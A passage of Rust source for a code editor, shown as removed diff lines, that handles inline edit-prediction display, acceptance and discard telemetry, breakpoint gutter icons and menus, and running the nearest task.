self.buffer.read(cx).text_anchor_for_position(cursor, cx)?; - - if !self.edit_predictions_enabled_in_buffer(&buffer, cursor_buffer_position, cx) { - self.discard_inline_completion(false, cx); - return None; - } - - if !user_requested - && (!self.should_show_edit_predictions() - || !self.is_focused(window) - || buffer.read(cx).is_empty()) - { - self.discard_inline_completion(false, cx); - return None; - } - - self.update_visible_inline_completion(window, cx); - provider.refresh( - self.project.clone(), - buffer, - cursor_buffer_position, - debounce, - cx, - ); - Some(()) - } - - fn show_edit_predictions_in_menu(&self) -> bool { - match self.edit_prediction_settings { - EditPredictionSettings::Disabled => false, - EditPredictionSettings::Enabled { show_in_menu, .. } => show_in_menu, - } - } - - pub fn edit_predictions_enabled(&self) -> bool { - match self.edit_prediction_settings { - EditPredictionSettings::Disabled => false, - EditPredictionSettings::Enabled { .. } => true, - } - } - - fn edit_prediction_requires_modifier(&self) -> bool { - match self.edit_prediction_settings { - EditPredictionSettings::Disabled => false, - EditPredictionSettings::Enabled { - preview_requires_modifier, - .. - } => preview_requires_modifier, - } - } - - pub fn update_edit_prediction_settings(&mut self, cx: &mut Context) { - if self.edit_prediction_provider.is_none() { - self.edit_prediction_settings = EditPredictionSettings::Disabled; - } else { - let selection = self.selections.newest_anchor(); - let cursor = selection.head(); - - if let Some((buffer, cursor_buffer_position)) = - self.buffer.read(cx).text_anchor_for_position(cursor, cx) - { - self.edit_prediction_settings = - self.edit_prediction_settings_at_position(&buffer, cursor_buffer_position, cx); - } - } - } - - fn edit_prediction_settings_at_position( - &self, - buffer: &Entity, - buffer_position: language::Anchor, - cx: &App, - ) -> EditPredictionSettings { - if !self.mode.is_full() - || !self.show_inline_completions_override.unwrap_or(true) - || self.inline_completions_disabled_in_scope(buffer, buffer_position, cx) - { - return EditPredictionSettings::Disabled; - } - - let buffer = buffer.read(cx); - - let file = buffer.file(); - - if !language_settings(cx).buffer(buffer).get().show_edit_predictions { - return EditPredictionSettings::Disabled; - }; - - let by_provider = matches!( - self.menu_inline_completions_policy, - MenuInlineCompletionsPolicy::ByProvider - ); - - let show_in_menu = by_provider - && self - .edit_prediction_provider - .as_ref() - .map_or(false, |provider| { - provider.provider.show_completions_in_menu() - }); - - let preview_requires_modifier = - all_language_settings(file, cx).edit_predictions_mode() == EditPredictionsMode::Subtle; - - EditPredictionSettings::Enabled { - show_in_menu, - preview_requires_modifier, - } - } - - fn should_show_edit_predictions(&self) -> bool { - self.snippet_stack.is_empty() && self.edit_predictions_enabled() - } - - pub fn edit_prediction_preview_is_active(&self) -> bool { - matches!( - self.edit_prediction_preview, - EditPredictionPreview::Active { .. } - ) - } - - pub fn edit_predictions_enabled_at_cursor(&self, cx: &App) -> bool { - let cursor = self.selections.newest_anchor().head(); - if let Some((buffer, cursor_position)) = - self.buffer.read(cx).text_anchor_for_position(cursor, cx) - { - self.edit_predictions_enabled_in_buffer(&buffer, cursor_position, cx) - } else { - false - } - } - - fn edit_predictions_enabled_in_buffer( - &self, - buffer: &Entity, - buffer_position: language::Anchor, - cx: &App, - ) -> bool { - maybe!({ - if self.read_only(cx) { - return Some(false); - } - let provider = self.edit_prediction_provider()?; - if !provider.is_enabled(&buffer, buffer_position, cx) { - return Some(false); - } - let buffer = buffer.read(cx); - let Some(file) = buffer.file() else { - return Some(true); - }; - let settings = all_language_settings(Some(file), cx); - Some(settings.edit_predictions_enabled_for_file(file, cx)) - }) - .unwrap_or(false) - } - - fn cycle_inline_completion( - &mut self, - direction: Direction, - window: &mut Window, - cx: &mut Context, - ) -> Option<()> { - let provider = self.edit_prediction_provider()?; - let cursor = self.selections.newest_anchor().head(); - let (buffer, cursor_buffer_position) = - self.buffer.read(cx).text_anchor_for_position(cursor, cx)?; - if self.inline_completions_hidden_for_vim_mode || !self.should_show_edit_predictions() { - return None; - } - - provider.cycle(buffer, cursor_buffer_position, direction, cx); - self.update_visible_inline_completion(window, cx); - - Some(()) - } - - pub fn show_inline_completion( - &mut self, - _: &ShowEditPrediction, - window: &mut Window, - cx: &mut Context, - ) { - if !self.has_active_inline_completion() { - self.refresh_inline_completion(false, true, window, cx); - return; - } - - self.update_visible_inline_completion(window, cx); - } - - pub fn display_cursor_names( - &mut self, - _: &DisplayCursorNames, - window: &mut Window, - cx: &mut Context, - ) { - self.show_cursor_names(window, cx); - } - - fn show_cursor_names(&mut self, window: &mut Window, cx: &mut Context) { - self.show_cursor_names = true; - cx.notify(); - cx.spawn_in(window, async move |this, cx| { - cx.background_executor().timer(CURSORS_VISIBLE_FOR).await; - this.update(cx, |this, cx| { - this.show_cursor_names = false; - cx.notify() - }) - .ok() - }) - .detach(); - } - - pub fn next_edit_prediction( - &mut self, - _: &NextEditPrediction, - window: &mut Window, - cx: &mut Context, - ) { - if self.has_active_inline_completion() { - self.cycle_inline_completion(Direction::Next, window, cx); - } else { - let is_copilot_disabled = self - .refresh_inline_completion(false, true, window, cx) - .is_none(); - if is_copilot_disabled { - cx.propagate(); - } - } - } - - pub fn previous_edit_prediction( - &mut self, - _: &PreviousEditPrediction, - window: &mut Window, - cx: &mut Context, - ) { - if self.has_active_inline_completion() { - self.cycle_inline_completion(Direction::Prev, window, cx); - } else { - let is_copilot_disabled = self - .refresh_inline_completion(false, true, window, cx) - .is_none(); - if is_copilot_disabled { - cx.propagate(); - } - } - } - - pub fn accept_edit_prediction( - &mut self, - _: &AcceptEditPrediction, - window: &mut Window, - cx: &mut Context, - ) { - if self.show_edit_predictions_in_menu() { - self.hide_context_menu(window, cx); - } - - let Some(active_inline_completion) = self.active_inline_completion.as_ref() else { - return; - }; - - self.report_inline_completion_event( - active_inline_completion.completion_id.clone(), - true, - cx, - ); - - match &active_inline_completion.completion { - InlineCompletion::Move { target, .. } => { - let target = *target; - - if let Some(position_map) = &self.last_position_map { - if position_map - .visible_row_range - .contains(&target.to_display_point(&position_map.snapshot).row()) - || !self.edit_prediction_requires_modifier() - { - self.unfold_ranges(&[target..target], true, false, cx); - // Note that this is also done in vim's handler of the Tab action. - self.change_selections( - Some(Autoscroll::newest()), - window, - cx, - |selections| { - selections.select_anchor_ranges([target..target]); - }, - ); - self.clear_row_highlights::(); - - self.edit_prediction_preview - .set_previous_scroll_position(None); - } else { - self.edit_prediction_preview - .set_previous_scroll_position(Some( - position_map.snapshot.scroll_anchor, - )); - - self.highlight_rows::( - target..target, - cx.theme().colors().editor_highlighted_line_background, - RowHighlightOptions { - autoscroll: true, - ..Default::default() - }, - cx, - ); - self.request_autoscroll(Autoscroll::fit(), cx); - } - } - } - InlineCompletion::Edit { edits, .. } => { - if let Some(provider) = self.edit_prediction_provider() { - provider.accept(cx); - } - - let snapshot = self.buffer.read(cx).snapshot(cx); - let last_edit_end = edits.last().unwrap().0.end.bias_right(&snapshot); - - self.buffer.update(cx, |buffer, cx| { - buffer.edit(edits.iter().cloned(), None, cx) - }); - - self.change_selections(None, window, cx, |s| { - s.select_anchor_ranges([last_edit_end..last_edit_end]) - }); - - self.update_visible_inline_completion(window, cx); - if self.active_inline_completion.is_none() { - self.refresh_inline_completion(true, true, window, cx); - } - - cx.notify(); - } - } - - self.edit_prediction_requires_modifier_in_indent_conflict = false; - } - - pub fn accept_partial_inline_completion( - &mut self, - _: &AcceptPartialEditPrediction, - window: &mut Window, - cx: &mut Context, - ) { - let Some(active_inline_completion) = self.active_inline_completion.as_ref() else { - return; - }; - if self.selections.count() != 1 { - return; - } - - self.report_inline_completion_event( - active_inline_completion.completion_id.clone(), - true, - cx, - ); - - match &active_inline_completion.completion { - InlineCompletion::Move { target, .. } => { - let target = *target; - self.change_selections(Some(Autoscroll::newest()), window, cx, |selections| { - selections.select_anchor_ranges([target..target]); - }); - } - InlineCompletion::Edit { edits, .. } => { - // Find an insertion that starts at the cursor position. - let snapshot = self.buffer.read(cx).snapshot(cx); - let cursor_offset = self.selections.newest::(cx).head(); - let insertion = edits.iter().find_map(|(range, text)| { - let range = range.to_offset(&snapshot); - if range.is_empty() && range.start == cursor_offset { - Some(text) - } else { - None - } - }); - - if let Some(text) = insertion { - let mut partial_completion = text - .chars() - .by_ref() - .take_while(|c| c.is_alphabetic()) - .collect::(); - if partial_completion.is_empty() { - partial_completion = text - .chars() - .by_ref() - .take_while(|c| c.is_whitespace() || !c.is_alphabetic()) - .collect::(); - } - - cx.emit(EditorEvent::InputHandled { - utf16_range_to_replace: None, - text: partial_completion.clone().into(), - }); - - self.insert_with_autoindent_mode(&partial_completion, None, window, cx); - - self.refresh_inline_completion(true, true, window, cx); - cx.notify(); - } else { - self.accept_edit_prediction(&Default::default(), window, cx); - } - } - } - } - - fn discard_inline_completion( - &mut self, - should_report_inline_completion_event: bool, - cx: &mut Context, - ) -> bool { - if should_report_inline_completion_event { - let completion_id = self - .active_inline_completion - .as_ref() - .and_then(|active_completion| active_completion.completion_id.clone()); - - self.report_inline_completion_event(completion_id, false, cx); - } - - if let Some(provider) = self.edit_prediction_provider() { - provider.discard(cx); - } - - self.take_active_inline_completion(cx) - } - - fn report_inline_completion_event(&self, id: Option, accepted: bool, cx: &App) { - let Some(provider) = self.edit_prediction_provider() else { - return; - }; - - let Some((_, buffer, _)) = self - .buffer - .read(cx) - .excerpt_containing(self.selections.newest_anchor().head(), cx) - else { - return; - }; - - let extension = buffer - .read(cx) - .file() - .and_then(|file| Some(file.path().extension()?.to_string_lossy().to_string())); - - let event_type = match accepted { - true => "Edit Prediction Accepted", - false => "Edit Prediction Discarded", - }; - telemetry::event!( - event_type, - provider = provider.name(), - prediction_id = id, - suggestion_accepted = accepted, - file_extension = extension, - ); - } - - pub fn has_active_inline_completion(&self) -> bool { - self.active_inline_completion.is_some() - } - - fn take_active_inline_completion(&mut self, cx: &mut Context) -> bool { - let Some(active_inline_completion) = self.active_inline_completion.take() else { - return false; - }; - - self.splice_inlays(&active_inline_completion.inlay_ids, Default::default(), cx); - self.clear_highlights::(cx); - self.stale_inline_completion_in_menu = Some(active_inline_completion); - true - } - - /// Returns true when we're displaying the edit prediction popover below the cursor - /// like we are not previewing and the LSP autocomplete menu is visible - /// or we are in `when_holding_modifier` mode. - pub fn edit_prediction_visible_in_cursor_popover(&self, has_completion: bool) -> bool { - if self.edit_prediction_preview_is_active() - || !self.show_edit_predictions_in_menu() - || !self.edit_predictions_enabled() - { - return false; - } - - if self.has_visible_completions_menu() { - return true; - } - - has_completion && self.edit_prediction_requires_modifier() - } - - fn handle_modifiers_changed( - &mut self, - modifiers: Modifiers, - position_map: &PositionMap, - window: &mut Window, - cx: &mut Context, - ) { - if self.show_edit_predictions_in_menu() { - self.update_edit_prediction_preview(&modifiers, window, cx); - } - - self.update_selection_mode(&modifiers, position_map, window, cx); - - let mouse_position = window.mouse_position(); - if !position_map.text_hitbox.is_hovered(window) { - return; - } - - self.update_hovered_link( - position_map.point_for_position(mouse_position), - &position_map.snapshot, - modifiers, - window, - cx, - ) - } - - fn update_selection_mode( - &mut self, - modifiers: &Modifiers, - position_map: &PositionMap, - window: &mut Window, - cx: &mut Context, - ) { - if modifiers != &COLUMNAR_SELECTION_MODIFIERS || self.selections.pending.is_none() { - return; - } - - let mouse_position = window.mouse_position(); - let point_for_position = position_map.point_for_position(mouse_position); - let position = point_for_position.previous_valid; - - self.select( - SelectPhase::BeginColumnar { - position, - reset: false, - goal_column: point_for_position.exact_unclipped.column(), - }, - window, - cx, - ); - } - - fn update_edit_prediction_preview( - &mut self, - modifiers: &Modifiers, - window: &mut Window, - cx: &mut Context, - ) { - let accept_keybind = self.accept_edit_prediction_keybind(window, cx); - let Some(accept_keystroke) = accept_keybind.keystroke() else { - return; - }; - - if &accept_keystroke.modifiers == modifiers && accept_keystroke.modifiers.modified() { - if matches!( - self.edit_prediction_preview, - EditPredictionPreview::Inactive { .. } - ) { - self.edit_prediction_preview = EditPredictionPreview::Active { - previous_scroll_position: None, - since: Instant::now(), - }; - - self.update_visible_inline_completion(window, cx); - cx.notify(); - } - } else if let EditPredictionPreview::Active { - previous_scroll_position, - since, - } = self.edit_prediction_preview - { - if let (Some(previous_scroll_position), Some(position_map)) = - (previous_scroll_position, self.last_position_map.as_ref()) - { - self.set_scroll_position( - previous_scroll_position - .scroll_position(&position_map.snapshot.display_snapshot), - window, - cx, - ); - } - - self.edit_prediction_preview = EditPredictionPreview::Inactive { - released_too_fast: since.elapsed() < Duration::from_millis(200), - }; - self.clear_row_highlights::(); - self.update_visible_inline_completion(window, cx); - cx.notify(); - } - } - - fn update_visible_inline_completion( - &mut self, - _window: &mut Window, - cx: &mut Context, - ) -> Option<()> { - let selection = self.selections.newest_anchor(); - let cursor = selection.head(); - let multibuffer = self.buffer.read(cx).snapshot(cx); - let offset_selection = selection.map(|endpoint| endpoint.to_offset(&multibuffer)); - let excerpt_id = cursor.excerpt_id; - - let show_in_menu = self.show_edit_predictions_in_menu(); - let completions_menu_has_precedence = !show_in_menu - && (self.context_menu.borrow().is_some() - || (!self.completion_tasks.is_empty() && !self.has_active_inline_completion())); - - if completions_menu_has_precedence - || !offset_selection.is_empty() - || self - .active_inline_completion - .as_ref() - .map_or(false, |completion| { - let invalidation_range = completion.invalidation_range.to_offset(&multibuffer); - let invalidation_range = invalidation_range.start..=invalidation_range.end; - !invalidation_range.contains(&offset_selection.head()) - }) - { - self.discard_inline_completion(false, cx); - return None; - } - - self.take_active_inline_completion(cx); - let Some(provider) = self.edit_prediction_provider() else { - self.edit_prediction_settings = EditPredictionSettings::Disabled; - return None; - }; - - let (buffer, cursor_buffer_position) = - self.buffer.read(cx).text_anchor_for_position(cursor, cx)?; - - self.edit_prediction_settings = - self.edit_prediction_settings_at_position(&buffer, cursor_buffer_position, cx); - - self.edit_prediction_indent_conflict = multibuffer.is_line_whitespace_upto(cursor); - - if self.edit_prediction_indent_conflict { - let cursor_point = cursor.to_point(&multibuffer); - - let indents = multibuffer.suggested_indents(cursor_point.row..cursor_point.row + 1, cx); - - if let Some((_, indent)) = indents.iter().next() { - if indent.len == cursor_point.column { - self.edit_prediction_indent_conflict = false; - } - } - } - - let inline_completion = provider.suggest(&buffer, cursor_buffer_position, cx)?; - let edits = inline_completion - .edits - .into_iter() - .flat_map(|(range, new_text)| { - let start = multibuffer.anchor_in_excerpt(excerpt_id, range.start)?; - let end = multibuffer.anchor_in_excerpt(excerpt_id, range.end)?; - Some((start..end, new_text)) - }) - .collect::>(); - if edits.is_empty() { - return None; - } - - let first_edit_start = edits.first().unwrap().0.start; - let first_edit_start_point = first_edit_start.to_point(&multibuffer); - let edit_start_row = first_edit_start_point.row.saturating_sub(2); - - let last_edit_end = edits.last().unwrap().0.end; - let last_edit_end_point = last_edit_end.to_point(&multibuffer); - let edit_end_row = cmp::min(multibuffer.max_point().row, last_edit_end_point.row + 2); - - let cursor_row = cursor.to_point(&multibuffer).row; - - let snapshot = multibuffer.buffer_for_excerpt(excerpt_id).cloned()?; - - let mut inlay_ids = Vec::new(); - let invalidation_row_range; - let move_invalidation_row_range = if cursor_row < edit_start_row { - Some(cursor_row..edit_end_row) - } else if cursor_row > edit_end_row { - Some(edit_start_row..cursor_row) - } else { - None - }; - let is_move = - move_invalidation_row_range.is_some() || self.inline_completions_hidden_for_vim_mode; - let completion = if is_move { - invalidation_row_range = - move_invalidation_row_range.unwrap_or(edit_start_row..edit_end_row); - let target = first_edit_start; - InlineCompletion::Move { target, snapshot } - } else { - let show_completions_in_buffer = !self.edit_prediction_visible_in_cursor_popover(true) - && !self.inline_completions_hidden_for_vim_mode; - - if show_completions_in_buffer { - if edits - .iter() - .all(|(range, _)| range.to_offset(&multibuffer).is_empty()) - { - let mut inlays = Vec::new(); - for (range, new_text) in &edits { - let inlay = Inlay::inline_completion( - post_inc(&mut self.next_inlay_id), - range.start, - new_text.as_str(), - ); - inlay_ids.push(inlay.id); - inlays.push(inlay); - } - - self.splice_inlays(&[], inlays, cx); - } else { - let background_color = cx.theme().status().deleted_background; - self.highlight_text::( - edits.iter().map(|(range, _)| range.clone()).collect(), - HighlightStyle { - background_color: Some(background_color), - ..Default::default() - }, - cx, - ); - } - } - - invalidation_row_range = edit_start_row..edit_end_row; - - let display_mode = if all_edits_insertions_or_deletions(&edits, &multibuffer) { - if provider.show_tab_accept_marker() { - EditDisplayMode::TabAccept - } else { - EditDisplayMode::Inline - } - } else { - EditDisplayMode::DiffPopover - }; - - InlineCompletion::Edit { - edits, - edit_preview: inline_completion.edit_preview, - display_mode, - snapshot, - } - }; - - let invalidation_range = multibuffer - .anchor_before(Point::new(invalidation_row_range.start, 0)) - ..multibuffer.anchor_after(Point::new( - invalidation_row_range.end, - multibuffer.line_len(MultiBufferRow(invalidation_row_range.end)), - )); - - self.stale_inline_completion_in_menu = None; - self.active_inline_completion = Some(InlineCompletionState { - inlay_ids, - completion, - completion_id: inline_completion.id, - invalidation_range, - }); - - cx.notify(); - - Some(()) - } - - pub fn edit_prediction_provider(&self) -> Option> { - Some(self.edit_prediction_provider.as_ref()?.provider.clone()) - } - - fn render_code_actions_indicator( - &self, - _style: &EditorStyle, - row: DisplayRow, - is_active: bool, - breakpoint: Option<&(Anchor, Breakpoint)>, - cx: &mut Context, - ) -> Option { - let color = Color::Muted; - let position = breakpoint.as_ref().map(|(anchor, _)| *anchor); - let show_tooltip = !self.context_menu_visible(); - - if self.available_code_actions.is_some() { - Some( - IconButton::new("code_actions_indicator", ui::IconName::Bolt) - .shape(ui::IconButtonShape::Square) - .icon_size(IconSize::XSmall) - .icon_color(color) - .toggle_state(is_active) - .when(show_tooltip, |this| { - this.tooltip({ - let focus_handle = self.focus_handle.clone(); - move |window, cx| { - Tooltip::for_action_in( - "Toggle Code Actions", - &ToggleCodeActions { - deployed_from_indicator: None, - quick_launch: false, - }, - &focus_handle, - window, - cx, - ) - } - }) - }) - .on_click(cx.listener(move |editor, e: &ClickEvent, window, cx| { - let quick_launch = e.down.button == MouseButton::Left; - window.focus(&editor.focus_handle(cx)); - editor.toggle_code_actions( - &ToggleCodeActions { - deployed_from_indicator: Some(row), - quick_launch, - }, - window, - cx, - ); - })) - .on_right_click(cx.listener(move |editor, event: &ClickEvent, window, cx| { - editor.set_breakpoint_context_menu( - row, - position, - event.down.position, - window, - cx, - ); - })), - ) - } else { - None - } - } - - fn clear_tasks(&mut self) { - self.tasks.clear() - } - - fn insert_tasks(&mut self, key: (BufferId, BufferRow), value: RunnableTasks) { - if self.tasks.insert(key, value).is_some() { - // This case should hopefully be rare, but just in case... - log::error!( - "multiple different run targets found on a single line, only the last target will be rendered" - ) - } - } - - /// Get all display points of breakpoints that will be rendered within editor - /// - /// This function is used to handle overlaps between breakpoints and Code action/runner symbol. - /// It's also used to set the color of line numbers with breakpoints to the breakpoint color. - /// TODO debugger: Use this function to color toggle symbols that house nested breakpoints - fn active_breakpoints( - &self, - range: Range, - window: &mut Window, - cx: &mut Context, - ) -> HashMap { - let mut breakpoint_display_points = HashMap::default(); - - let Some(breakpoint_store) = self.breakpoint_store.clone() else { - return breakpoint_display_points; - }; - - let snapshot = self.snapshot(window, cx); - - let multi_buffer_snapshot = &snapshot.display_snapshot.buffer_snapshot; - let Some(project) = self.project.as_ref() else { - return breakpoint_display_points; - }; - - let range = snapshot.display_point_to_point(DisplayPoint::new(range.start, 0), Bias::Left) - ..snapshot.display_point_to_point(DisplayPoint::new(range.end, 0), Bias::Right); - - for (buffer_snapshot, range, excerpt_id) in - multi_buffer_snapshot.range_to_buffer_ranges(range) - { - let Some(buffer) = project.read_with(cx, |this, cx| { - this.buffer_for_id(buffer_snapshot.remote_id(), cx) - }) else { - continue; - }; - let breakpoints = breakpoint_store.read(cx).breakpoints( - &buffer, - Some( - buffer_snapshot.anchor_before(range.start) - ..buffer_snapshot.anchor_after(range.end), - ), - buffer_snapshot, - cx, - ); - for (anchor, breakpoint) in breakpoints { - let multi_buffer_anchor = - Anchor::in_buffer(excerpt_id, buffer_snapshot.remote_id(), *anchor); - let position = multi_buffer_anchor - .to_point(&multi_buffer_snapshot) - .to_display_point(&snapshot); - - breakpoint_display_points - .insert(position.row(), (multi_buffer_anchor, breakpoint.clone())); - } - } - - breakpoint_display_points - } - - fn breakpoint_context_menu( - &self, - anchor: Anchor, - window: &mut Window, - cx: &mut Context, - ) -> Entity { - let weak_editor = cx.weak_entity(); - let focus_handle = self.focus_handle(cx); - - let row = self - .buffer - .read(cx) - .snapshot(cx) - .summary_for_anchor::(&anchor) - .row; - - let breakpoint = self - .breakpoint_at_row(row, window, cx) - .map(|(anchor, bp)| (anchor, Arc::from(bp))); - - let log_breakpoint_msg = if breakpoint.as_ref().is_some_and(|bp| bp.1.message.is_some()) { - "Edit Log Breakpoint" - } else { - "Set Log Breakpoint" - }; - - let condition_breakpoint_msg = if breakpoint - .as_ref() - .is_some_and(|bp| bp.1.condition.is_some()) - { - "Edit Condition Breakpoint" - } else { - "Set Condition Breakpoint" - }; - - let hit_condition_breakpoint_msg = if breakpoint - .as_ref() - .is_some_and(|bp| bp.1.hit_condition.is_some()) - { - "Edit Hit Condition Breakpoint" - } else { - "Set Hit Condition Breakpoint" - }; - - let set_breakpoint_msg = if breakpoint.as_ref().is_some() { - "Unset Breakpoint" - } else { - "Set Breakpoint" - }; - - let run_to_cursor = command_palette_hooks::CommandPaletteFilter::try_global(cx) - .map_or(false, |filter| !filter.is_hidden(&DebuggerRunToCursor)); - - let toggle_state_msg = breakpoint.as_ref().map_or(None, |bp| match bp.1.state { - BreakpointState::Enabled => Some("Disable"), - BreakpointState::Disabled => Some("Enable"), - }); - - let (anchor, breakpoint) = - breakpoint.unwrap_or_else(|| (anchor, Arc::new(Breakpoint::new_standard()))); - - ui::ContextMenu::build(window, cx, |menu, _, _cx| { - menu.on_blur_subscription(Subscription::new(|| {})) - .context(focus_handle) - .when(run_to_cursor, |this| { - let weak_editor = weak_editor.clone(); - this.entry("Run to cursor", None, move |window, cx| { - weak_editor - .update(cx, |editor, cx| { - editor.change_selections(None, window, cx, |s| { - s.select_ranges([Point::new(row, 0)..Point::new(row, 0)]) - }); - }) - .ok(); - - window.dispatch_action(Box::new(DebuggerRunToCursor), cx); - }) - .separator() - }) - .when_some(toggle_state_msg, |this, msg| { - this.entry(msg, None, { - let weak_editor = weak_editor.clone(); - let breakpoint = breakpoint.clone(); - move |_window, cx| { - weak_editor - .update(cx, |this, cx| { - this.edit_breakpoint_at_anchor( - anchor, - breakpoint.as_ref().clone(), - BreakpointEditAction::InvertState, - cx, - ); - }) - .log_err(); - } - }) - }) - .entry(set_breakpoint_msg, None, { - let weak_editor = weak_editor.clone(); - let breakpoint = breakpoint.clone(); - move |_window, cx| { - weak_editor - .update(cx, |this, cx| { - this.edit_breakpoint_at_anchor( - anchor, - breakpoint.as_ref().clone(), - BreakpointEditAction::Toggle, - cx, - ); - }) - .log_err(); - } - }) - .entry(log_breakpoint_msg, None, { - let breakpoint = breakpoint.clone(); - let weak_editor = weak_editor.clone(); - move |window, cx| { - weak_editor - .update(cx, |this, cx| { - this.add_edit_breakpoint_block( - anchor, - breakpoint.as_ref(), - BreakpointPromptEditAction::Log, - window, - cx, - ); - }) - .log_err(); - } - }) - .entry(condition_breakpoint_msg, None, { - let breakpoint = breakpoint.clone(); - let weak_editor = weak_editor.clone(); - move |window, cx| { - weak_editor - .update(cx, |this, cx| { - this.add_edit_breakpoint_block( - anchor, - breakpoint.as_ref(), - BreakpointPromptEditAction::Condition, - window, - cx, - ); - }) - .log_err(); - } - }) - .entry(hit_condition_breakpoint_msg, None, move |window, cx| { - weak_editor - .update(cx, |this, cx| { - this.add_edit_breakpoint_block( - anchor, - breakpoint.as_ref(), - BreakpointPromptEditAction::HitCondition, - window, - cx, - ); - }) - .log_err(); - }) - }) - } - - fn render_breakpoint( - &self, - position: Anchor, - row: DisplayRow, - breakpoint: &Breakpoint, - cx: &mut Context, - ) -> IconButton { - // Is it a breakpoint that shows up when hovering over gutter? - let (is_phantom, collides_with_existing) = self.gutter_breakpoint_indicator.0.map_or( - (false, false), - |PhantomBreakpointIndicator { - is_active, - display_row, - collides_with_existing_breakpoint, - }| { - ( - is_active && display_row == row, - collides_with_existing_breakpoint, - ) - }, - ); - - let (color, icon) = { - let icon = match (&breakpoint.message.is_some(), breakpoint.is_disabled()) { - (false, false) => ui::IconName::DebugBreakpoint, - (true, false) => ui::IconName::DebugLogBreakpoint, - (false, true) => ui::IconName::DebugDisabledBreakpoint, - (true, true) => ui::IconName::DebugDisabledLogBreakpoint, - }; - - let color = if is_phantom { - Color::Hint - } else { - Color::Debugger - }; - - (color, icon) - }; - - let breakpoint = Arc::from(breakpoint.clone()); - - let alt_as_text = gpui::Keystroke { - modifiers: Modifiers::secondary_key(), - ..Default::default() - }; - let primary_action_text = if breakpoint.is_disabled() { - "enable" - } else if is_phantom && !collides_with_existing { - "set" - } else { - "unset" - }; - let mut primary_text = format!("Click to {primary_action_text}"); - if collides_with_existing && !breakpoint.is_disabled() { - use std::fmt::Write; - write!(primary_text, ", {alt_as_text}-click to disable").ok(); - } - let primary_text = SharedString::from(primary_text); - let focus_handle = self.focus_handle.clone(); - IconButton::new(("breakpoint_indicator", row.0 as usize), icon) - .icon_size(IconSize::XSmall) - .size(ui::ButtonSize::None) - .icon_color(color) - .style(ButtonStyle::Transparent) - .on_click(cx.listener({ - let breakpoint = breakpoint.clone(); - - move |editor, event: &ClickEvent, window, cx| { - let edit_action = if event.modifiers().platform || breakpoint.is_disabled() { - BreakpointEditAction::InvertState - } else { - BreakpointEditAction::Toggle - }; - - window.focus(&editor.focus_handle(cx)); - editor.edit_breakpoint_at_anchor( - position, - breakpoint.as_ref().clone(), - edit_action, - cx, - ); - } - })) - .on_right_click(cx.listener(move |editor, event: &ClickEvent, window, cx| { - editor.set_breakpoint_context_menu( - row, - Some(position), - event.down.position, - window, - cx, - ); - })) - .tooltip(move |window, cx| { - Tooltip::with_meta_in( - primary_text.clone(), - None, - "Right-click for more options", - &focus_handle, - window, - cx, - ) - }) - } - - fn build_tasks_context( - project: &Entity, - buffer: &Entity, - buffer_row: u32, - tasks: &Arc, - cx: &mut Context, - ) -> Task> { - let position = Point::new(buffer_row, tasks.column); - let range_start = buffer.read(cx).anchor_at(position, Bias::Right); - let location = Location { - buffer: buffer.clone(), - range: range_start..range_start, - }; - // Fill in the environmental variables from the tree-sitter captures - let mut captured_task_variables = TaskVariables::default(); - for (capture_name, value) in tasks.extra_variables.clone() { - captured_task_variables.insert( - task::VariableName::Custom(capture_name.into()), - value.clone(), - ); - } - project.update(cx, |project, cx| { - project.task_store().update(cx, |task_store, cx| { - task_store.task_context_for_location(captured_task_variables, location, cx) - }) - }) - } - - pub fn spawn_nearest_task( - &mut self, - action: &SpawnNearestTask, - window: &mut Window, - cx: &mut Context, - ) { - let Some((workspace, _)) = self.workspace.clone() else { - return; - }; - let Some(project) = self.project.clone() else { - return; - }; - - // Try to find a closest, enclosing node using tree-sitter that has a - // task - let Some((buffer, buffer_row, tasks)) = self - .find_enclosing_node_task(cx) - // Or find the task that's closest in row-distance. - .or_else(|| self.find_closest_task(cx)) - else { - return; - }; - - let reveal_strategy = action.reveal; - let task_context = Self::build_tasks_context(&project, &buffer, buffer_row, &tasks, cx); - cx.spawn_in(window, async move |_, cx| { - let context = task_context.await?; - let (task_source_kind, mut resolved_task) = tasks.resolve(&context).next()?; - - let resolved = &mut resolved_task.resolved; - resolved.reveal = reveal_strategy; - - workspace - .update_in(cx, |workspace, window, cx| { - workspace.schedule_resolved_task( - task_source_kind, - resolved_task, - false, - window, - cx, - ); - }) - .ok() - }) - .detach(); - } - - fn find_closest_task( - &mut self, - cx: &mut Context, - ) -> Option<(Entity, u32, Arc)> { - let cursor_row = self.selections.newest_adjusted(cx).head().row; - - let ((buffer_id, row), tasks) = self - .tasks - .iter() - .min_by_key(|((_, row), _)| cursor_row.abs_diff(*row))?; - - let buffer = self.buffer.read(cx).buffer(*buffer_id)?; - let tasks = Arc::new(tasks.to_owned()); - Some((buffer, *row, tasks)) - } - - fn find_enclosing_node_task( - &mut self, - cx: &mut Context, - ) -> Option<(Entity, u32, Arc)> { - let snapshot = self.buffer.read(cx).snapshot(cx); - let offset = self.selections.newest::(cx).head(); - let excerpt = snapshot.excerpt_containing(offset..offset)?; - let buffer_id = excerpt.buffer().remote_id(); - - let layer = excerpt.buffer().syntax_layer_at(offset)?; - let mut cursor = layer.node().walk(); - - while cursor.goto_first_child_for_byte(offset).is_some() { - if cursor.node().end_byte() == offset { - cursor.goto_next_sibling(); - } - } - - // Ascend to the smallest ancestor that contains the range and has a task. - loop { - let node = cursor.node(); - let node_range = node.byte_range(); - let symbol_start_row = excerpt.buffer().offset_to_point(node.start_byte()).row; - - // Check if this node contains our offset - if node_range.start <= offset && node_range.end >= offset { - // If it contains offset, check for task - if let Some(tasks) = self.tasks.get(&(buffer_id, symbol_start_row)) { - let buffer = self.buffer.read(cx).buffer(buffer_id)?; - return Some((buffer, symbol_start_row, Arc::new(tasks.to_owned()))); - } - } - - if !cursor.goto_parent() { - break; - } - } - None - } - - fn render_run_indicator( - &self, - _style: &EditorStyle, - is_active: bool, - row: DisplayRow, - breakpoint: Option<(Anchor, Breakpoint)>, - cx: &mut Context, - ) -> IconButton { - let color = Color::Muted; - let position = breakpoint.as_ref().map(|(anchor, _)| *anchor); - - IconButton::new(("run_indicator", row.0 as usize), ui::IconName::Play) - .shape(ui::IconButtonShape::Square) - .icon_size(IconSize::XSmall) - .icon_color(color) - .toggle_state(is_active) - .on_click(cx.listener(move |editor, e: &ClickEvent, window, cx| { - let quick_launch = e.down.button == MouseButton::Left; - window.focus(&editor.focus_handle(cx)); - editor.toggle_code_actions( - &ToggleCodeActions { - deployed_from_indicator: Some(row), - quick_launch, - }, - window, - cx, - ); - })) - .on_right_click(cx.listener(move |editor, event: &ClickEvent, window, cx| 